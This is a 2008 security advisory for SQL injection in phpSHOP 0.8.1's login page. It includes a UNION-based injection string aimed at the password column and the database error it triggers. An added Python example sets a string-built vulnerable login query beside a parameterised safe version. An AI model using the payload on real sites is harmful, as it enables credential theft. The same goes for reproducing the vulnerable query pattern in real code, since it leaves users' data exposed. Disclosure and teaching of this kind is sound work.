phpshop081-sql.txt

2008-02-18T00:00:00
ID PACKETSTORM:63724
Type packetstorm
Reporter Anderson Luiz Tamborim
Modified 2008-02-18T00:00:00

Description

                                        
                                            `[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]  
Web Application: phpSHOP 0.8.1 SQL Injection  
  
Description: SQL injection in the login.php script of the open-source web e-commerce application phpSHOP.
  
[+]-------------------------------[+]
  
author: y2h4ck  
e-mail: y2h4ck[ at ] gmail.com  
page: http://y2h4ck.wordpress.com <http://y2h4ck.wordpress.com//>  
  
[+]-------------------------------[+]
Vuln script: http://shop/0.8.1/?login=1&&'[EXPLOIT]

String: /?login=admin'
+UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null  
  
In the login/password input box you can pass SQL injection strings that manipulate the behavior of the MySQL queries phpSHOP issues.
  
Result:  
[+]-------------------------------[+]
Database error: Invalid SQL: SELECT * from auth_user_md5,user_info WHERE
auth_user_md5.username ="1==1′ select –' AND auth_user_md5.password
='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.password
='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.user_id =
user_info.user_id AND user_info.address_type = 'BT'

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use
near '1==1′ select –' AND auth_user_md5.password
='d41d8cd98f00b204e9800998ecf8427e'A' at line 1)
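
The login query whose shape the error output above reveals, as an added example that is not part of the advisory or of phpSHOP's code: the string-built query beside a parameterised version, run against a constructed in-memory SQLite schema. The table and column names come from the error output; the remaining columns, the sample row and the single quotes around the username (the advisory's query uses double quotes) are assumptions. The hash d41d8cd98f00b204e9800998ecf8427e in the output is the MD5 of an empty password.

```python
import hashlib
import sqlite3

# Constructed schema approximating the two tables in the advisory's error output
# (auth_user_md5 joined to user_info on user_id). The extra columns and the sample
# row are assumptions; only the names visible in the advisory are taken from it.
SCHEMA = """
CREATE TABLE auth_user_md5 (user_id INTEGER, username TEXT, password TEXT);
CREATE TABLE user_info (user_id INTEGER, address_type TEXT, city TEXT);
INSERT INTO auth_user_md5 VALUES (1, 'admin', '{pw}');
INSERT INTO user_info VALUES (1, 'BT', 'Constructed City');
"""

def md5_hex(s):
    # phpSHOP 0.8.1 compares MD5 hex digests, as the advisory's query shows
    # (md5_hex("") is the d41d8cd9... value in the error output).
    return hashlib.md5(s.encode()).hexdigest()

def fresh_db(admin_password="constructed-secret"):
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA.format(pw=md5_hex(admin_password)))
    return conn

def vulnerable_login(conn, username, password):
    # The advisory's shape: user input is pasted straight into the SQL text. Single
    # quotes stand in for the advisory's double quotes around the username so that
    # SQLite, like MySQL, parses it as a string literal (an assumption).
    sql = ("SELECT * FROM auth_user_md5, user_info WHERE auth_user_md5.username = '%s' "
           "AND auth_user_md5.password = '%s' AND auth_user_md5.user_id = user_info.user_id "
           "AND user_info.address_type = 'BT'") % (username, md5_hex(password))
    return conn.execute(sql).fetchall()

def safe_login(conn, username, password):
    # Same query, but the values travel as bound parameters and cannot alter its structure.
    sql = ("SELECT * FROM auth_user_md5, user_info WHERE auth_user_md5.username = ? "
           "AND auth_user_md5.password = ? AND auth_user_md5.user_id = user_info.user_id "
           "AND user_info.address_type = 'BT'")
    return conn.execute(sql, (username, md5_hex(password))).fetchall()

def login_outcome(login_fn, username, password):
    # Returns "ok", "denied" or "sql_error"; a syntax error here is the SQLite
    # counterpart of the MySQL error 1064 shown in the advisory.
    conn = fresh_db()
    try:
        return "ok" if login_fn(conn, username, password) else "denied"
    except sqlite3.OperationalError:
        return "sql_error"
    finally:
        conn.close()
```

With the advisory's login string `admin'`, `vulnerable_login` produces a syntax error while `safe_login` simply treats it as a username that does not exist.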
  
[+]-------------------------------[+]
  
Version: 0.8.1  
Vendor: www.phpshop.org <http://www.phpshop.com/>
Date: 14/02/2008  
  
[+]-------------------------------[+]
  
--   
  
Sincerely,
Anderson Luiz Tamborim  
Information Security Manager  